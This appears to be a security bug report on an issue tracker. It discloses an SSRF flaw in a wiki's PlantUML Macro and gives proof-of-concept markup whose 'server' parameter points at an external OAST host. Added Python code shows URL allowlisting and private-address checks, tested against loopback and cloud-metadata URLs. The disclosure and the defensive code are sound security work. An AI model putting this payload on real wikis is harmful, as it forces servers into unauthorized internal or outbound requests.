There is 1 update.

PlantUML Macro / PLANTUML-25 Open

Server-Side Request Forgery (SSRF) in PlantUML Macro via 'server' parameter


Changes by Łukasz Rybak on 26/Nov/25 07:57

Description: *Impact*

The PlantUML Macro is vulnerable to Server-Side Request Forgery (SSRF). The macro allows users to specify an alternative PlantUML server via the {{server}} parameter.

However, the application does not validate the supplied URL. An attacker can supply an internal IP address or a malicious external URL. The XWiki server will attempt to connect to this URL to "render" the diagram.

*PoC*

1. Use an OAST service (like Burp Collaborator) to capture the interaction.
2. Create a wiki page with the following content:

{{plantuml server="http://oqiusawt5ny84yw017u6qgnay14ssmgb.oastify.com"}}
@startuml
A -> B: SSRF Test
@enduml
{{/plantuml}}

!image-2025-11-26-06-54-50-628.png!

3. Save and view the page.
!image-2025-11-25-20-31-57-213.png!
4. The XWiki server initiates an HTTP connection to the specified target.
!image-2025-11-25-20-32-25-311.png!

*Attribution*

Reported by: Łukasz Rybak (GitHub: https://github.com/lukasz-rybak)
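The report's root cause is that the `server` parameter is fetched without any validation. The following is an added example of the kind of check a macro should apply before fetching a user-supplied server URL; it is not XWiki or PlantUML Macro code. The allowlist (`DEFAULT_ALLOWED_HOSTS`), the `DEMO_DNS` table and every address in it are constructed for the example; `demo_resolver` stands in for DNS so the code runs offline, and `system_resolver` is the real lookup a deployment would use.

```python
"""Validate a user-supplied PlantUML 'server' URL before the wiki fetches it.

Added illustration, not XWiki or PlantUML Macro code. The allowlist, the
resolver table and every address in it are constructed for this example.
"""
import ipaddress
import socket
from typing import Callable, Iterable, List
from urllib.parse import urlsplit

# Hypothetical administrator-maintained allowlist of rendering servers.
DEFAULT_ALLOWED_HOSTS = frozenset({"www.plantuml.com"})

# Constructed name -> address table standing in for DNS so the demo runs offline.
DEMO_DNS = {
    "www.plantuml.com": ["93.184.216.34"],          # constructed public address
    "intranet.example": ["10.0.0.5"],               # constructed RFC 1918 address
    # OAST host from the PoC above; the address is constructed.
    "oqiusawt5ny84yw017u6qgnay14ssmgb.oastify.com": ["93.184.216.35"],
}


class UnsafeServerUrl(ValueError):
    """Raised when a server URL must not be fetched."""


def demo_resolver(host: str) -> List[str]:
    """Offline resolver backed by the constructed DEMO_DNS table."""
    return DEMO_DNS.get(host, [])


def system_resolver(host: str) -> List[str]:
    """Real DNS lookup (A and AAAA records) for production use."""
    infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    return sorted({info[4][0] for info in infos})


def _is_public(addr: str) -> bool:
    """True only for globally routable unicast addresses."""
    ip = ipaddress.ip_address(addr)
    # Unwrap IPv4-mapped IPv6 (::ffff:127.0.0.1) so the IPv4 rules apply.
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    # is_global is False for loopback, RFC 1918 / ULA, link-local (which covers
    # the 169.254.169.254 cloud metadata address), unspecified and reserved ranges.
    return ip.is_global and not ip.is_multicast


def validate_server_url(url: str,
                        resolver: Callable[[str], Iterable[str]] = system_resolver,
                        allowed_hosts: Iterable[str] = DEFAULT_ALLOWED_HOSTS,
                        require_allowlist: bool = True) -> List[str]:
    """Return the addresses the fetch may connect to, or raise UnsafeServerUrl.

    The caller should connect to one of the returned addresses (sending the
    validated name in the Host header) instead of resolving the name again;
    otherwise a DNS rebinding could swap in an internal address after the check.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise UnsafeServerUrl(f"scheme not allowed: {parts.scheme!r}")
    if parts.username is not None or parts.password is not None:
        raise UnsafeServerUrl("userinfo in URL is not allowed")
    host = parts.hostname
    if not host:
        raise UnsafeServerUrl("URL has no host")
    if require_allowlist and host not in set(allowed_hosts):
        raise UnsafeServerUrl(f"host not in allowlist: {host!r}")
    try:
        addrs = [str(ipaddress.ip_address(host))]   # host is an IP literal
    except ValueError:
        addrs = list(resolver(host))                # host is a name: resolve it
    if not addrs:
        raise UnsafeServerUrl(f"host does not resolve: {host!r}")
    bad = [a for a in addrs if not _is_public(a)]
    if bad:
        raise UnsafeServerUrl(f"{host!r} resolves to non-public address(es): {bad}")
    return addrs


def is_safe_server_url(url: str, **kwargs) -> bool:
    """Boolean convenience wrapper around validate_server_url."""
    try:
        validate_server_url(url, **kwargs)
        return True
    except UnsafeServerUrl:
        return False


if __name__ == "__main__":
    for candidate in ("http://www.plantuml.com/plantuml",
                      "http://127.0.0.1:8080/plantuml",
                      "http://169.254.169.254/latest/meta-data/",
                      "http://oqiusawt5ny84yw017u6qgnay14ssmgb.oastify.com"):
        print(candidate, "->", "allowed" if is_safe_server_url(candidate, resolver=demo_resolver) else "rejected")
```

The address-range check alone only covers the "internal IP address" half of the report: an external attacker-controlled host such as the OAST domain in the PoC resolves to a public address and passes it, so the allowlist is the control that blocks the outbound connection. Resolving the name once and connecting to the returned address is what keeps the check meaningful against DNS rebinding.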